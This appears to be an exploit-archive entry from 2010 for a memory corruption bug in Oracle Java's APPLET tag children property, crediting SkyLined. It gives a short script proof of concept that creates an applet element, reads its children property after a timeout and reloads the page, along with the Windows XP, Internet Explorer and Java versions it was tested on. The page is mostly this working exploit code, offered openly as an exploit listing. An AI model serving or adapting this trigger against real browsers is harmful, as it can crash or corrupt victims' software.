[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Oracle Java APPLET Tag Children Property Memory Corruption
# Published : 2010-10-13
# Author : SkyLined
# Previous Title : Multiple Buffer Overflows in Winamp v5.5.8.2985
# Next Title : Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups
Source: http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/
<SCRIPT>
o=document.createElement("applet");
setTimeout(function () {
x=o.children;
location.reload();
}, 1);
</SCRIPT>
Tested with:
Windows XP sp3 (5.1.2600)
MSIE 7.0.5730.13
MSIE 8.0.6001.18702
Sun Java Version 6 Update 20 1.6.0_20-b02